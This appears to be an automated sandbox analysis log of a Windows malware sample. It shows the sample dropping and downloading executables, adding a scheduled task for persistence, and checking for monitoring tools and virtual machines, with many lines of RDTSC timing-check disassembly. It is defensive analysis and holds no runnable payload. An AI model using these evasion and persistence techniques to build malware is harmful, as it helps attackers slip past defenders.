Source: Gxtuum.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x8038a
Source: rundrive[1].exe.1.dr | Static PE information: section name:
Source: rundrive[1].exe.1.dr | Static PE information: section name: .idata
Source: rundrive[1].exe.1.dr | Static PE information: section name:
Source: rundrive[1].exe.1.dr | Static PE information: section name: vonkwwrp
Source: rundrive[1].exe.1.dr | Static PE information: section name: axkanahc
Source: rundrive[1].exe.1.dr | Static PE information: section name: .taggant
Source: rundrive.exe.1.dr | Static PE information: section name:
Source: rundrive.exe.1.dr | Static PE information: section name: .idata
Source: rundrive.exe.1.dr | Static PE information: section name:
Source: rundrive.exe.1.dr | Static PE information: section name: vonkwwrp
Source: rundrive.exe.1.dr | Static PE information: section name: axkanahc
Source: rundrive.exe.1.dr | Static PE information: section name: .taggant
Source: eafkou.exe.4.dr | Static PE information: section name:
Source: eafkou.exe.4.dr | Static PE information: section name: .idata
Source: eafkou.exe.4.dr | Static PE information: section name:
Source: eafkou.exe.4.dr | Static PE information: section name: vonkwwrp
Source: eafkou.exe.4.dr | Static PE information: section name: axkanahc
Source: eafkou.exe.4.dr | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009A063 push ecx; ret 0_2_0009A076
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_000872EF pushad ; iretd 0_2_000872F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008FA063 push ecx; ret 1_2_008FA076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_008E72EF pushad ; iretd 1_2_008E72F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008FA063 push ecx; ret 2_2_008FA076
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 2_2_008E72EF pushad ; iretd 2_2_008E72F0
Source: rundrive[1].exe.1.dr | Static PE information: section name: entropy: 7.810542589941846
Source: rundrive[1].exe.1.dr | Static PE information: section name: vonkwwrp entropy: 7.951882985850609
Source: rundrive.exe.1.dr | Static PE information: section name: entropy: 7.810542589941846
Source: rundrive.exe.1.dr | Static PE information: section name: vonkwwrp entropy: 7.951882985850609
Source: eafkou.exe.4.dr | Static PE information: section name: entropy: 7.810542589941846
Source: eafkou.exe.4.dr | Static PE information: section name: vonkwwrp entropy: 7.951882985850609
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | File created: C:\ProgramData\rcjuo\eafkou.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | File created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\rundrive[1].exe
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | File created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | File created: C:\ProgramData\rcjuo\eafkou.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: FilemonClass
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: RegmonClass
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: FilemonClass
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: Regmonclass
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: Filemonclass
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\ProgramData\rcjuo\eafkou.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | File created: C:\Windows\Tasks\Gxtuum.job
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Code function: 0_2_0009918F GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0009918F
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\rcjuo\eafkou.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\rcjuo\eafkou.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 40BCF0 second address: 40BCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 40BCF5 second address: 40BCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 58DB92 second address: 58DB9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C00876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 58DB9C second address: 58DBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FDA80C026C2h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 58DBB4 second address: 58DBD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00888h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 58DE46 second address: 58DE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FDA80C026C8h 0x0000000b jmp 00007FDA80C026BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 58DE75 second address: 58DE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 590F62 second address: 590F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe | RDTSC instruction interceptor: First address: 590F6C second address: 590F94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C0087Bh 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 590F94 second address: 590F99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 590FE7 second address: 591006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FDA80C0087Ch 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 591006 second address: 591010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5910CE second address: 5910DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007FDA80C00884h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5910DF second address: 5910E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5910E3 second address: 591135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b jmp 00007FDA80C00887h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FDA80C00886h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007FDA80C0087Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 591135 second address: 59118D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FDA80C026B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 pushad 0x00000023 add dx, 0A5Ah 0x00000028 mov dword ptr [ebp+122D1A9Ch], ecx 0x0000002e popad 0x0000002f lea ebx, dword ptr [ebp+12458E61h] 0x00000035 mov cx, EBF0h 0x00000039 mov dword ptr [ebp+122D1A9Ch], ebx 0x0000003f push eax 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FDA80C026C3h 0x00000048 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 591278 second address: 59127C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 59127C second address: 5912FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 55386B14h 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FDA80C026B8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 or ecx, dword ptr [ebp+122D1A21h] 0x0000002e push 00000003h 0x00000030 mov cx, ax 0x00000033 push 00000000h 0x00000035 mov ecx, 03B80F00h 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FDA80C026B8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov ecx, dword ptr [ebp+122D38A8h] 0x0000005c push eax 0x0000005d mov edi, dword ptr [ebp+122D1F0Eh] 0x00000063 pop ecx 0x00000064 push 99CF73A9h 0x00000069 pushad 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FDA80C026BAh 0x00000071 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5913D4 second address: 5913D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5913D8 second address: 5913DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5913DC second address: 591474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov si, 196Ch 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D320Bh], edi 0x00000016 push 310BAE04h 0x0000001b jg 00007FDA80C00888h 0x00000021 jmp 00007FDA80C00882h 0x00000026 xor dword ptr [esp], 310BAE84h 0x0000002d call 00007FDA80C00887h 0x00000032 mov cl, CCh 0x00000034 pop esi 0x00000035 push 00000003h 0x00000037 push 00000000h 0x00000039 jmp 00007FDA80C0087Fh 0x0000003e push 00000003h 0x00000040 mov edx, 618F6CE6h 0x00000045 call 00007FDA80C00879h 0x0000004a push esi 0x0000004b jbe 00007FDA80C00878h 0x00000051 push ecx 0x00000052 pop ecx 0x00000053 pop esi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 jmp 00007FDA80C00882h 0x0000005d pop ebx 0x0000005e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 591474 second address: 5914B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d jg 00007FDA80C026BCh 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 jnc 00007FDA80C026BEh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDA80C026C2h 0x00000027 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5914B6 second address: 5914C0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C0087Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5A2E5E second address: 5A2E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5A2E63 second address: 5A2E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 577D39 second address: 577D58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDA80C026C8h 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AF86E second address: 5AF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AF874 second address: 5AF88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FDA80C026B6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AF88B second address: 5AF88F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AF88F second address: 5AF89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AFDB8 second address: 5AFDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5AFF39 second address: 5AFF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B008B second address: 5B008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B008F second address: 5B0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B0E10 second address: 5B0E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B0E14 second address: 5B0E39 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C026BAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C026C1h 0x00000013 jbe 00007FDA80C026B6h 0x00000019 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B1102 second address: 5B1107 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B4740 second address: 5B478C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FDA80C026C9h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 jg 00007FDA80C026B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FDA80C026BAh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B478C second address: 5B4791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B36DC second address: 5B36E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5B49DF second address: 5B49F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 580215 second address: 58021B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD3DA second address: 5BD3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Bh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD3E9 second address: 5BD3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD541 second address: 5BD56C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDA80C00876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e jmp 00007FDA80C00884h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop edx 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD6DF second address: 5BD6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDA80C026B6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD6E9 second address: 5BD70C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDA80C00888h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD70C second address: 5BD734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jg 00007FDA80C026B6h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FDA80C026C2h 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BD734 second address: 5BD754 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00876h 0x00000008 jmp 00007FDA80C00886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BDA56 second address: 5BDA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C3h 0x00000009 jmp 00007FDA80C026BFh 0x0000000e popad 0x0000000f jnc 00007FDA80C026C9h 0x00000015 jmp 00007FDA80C026BDh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BDA92 second address: 5BDAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BDBD4 second address: 5BDBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BDD43 second address: 5BDD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE703 second address: 5BE70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE847 second address: 5BE84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE84B second address: 5BE84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE84F second address: 5BE855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE855 second address: 5BE86C instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C026BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE86C second address: 5BE870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE870 second address: 5BE876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE876 second address: 5BE87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BE994 second address: 5BE998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BEB42 second address: 5BEB68 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDA80C00878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C00887h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 5BF721 second address: 5BF725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exeRDTSC instruction interceptor: First address: 583716 second address: 583762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007FDA80C00876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FDA80C00882h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FDA80C00889h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDA80C00881h 0x00000020 rdtsc
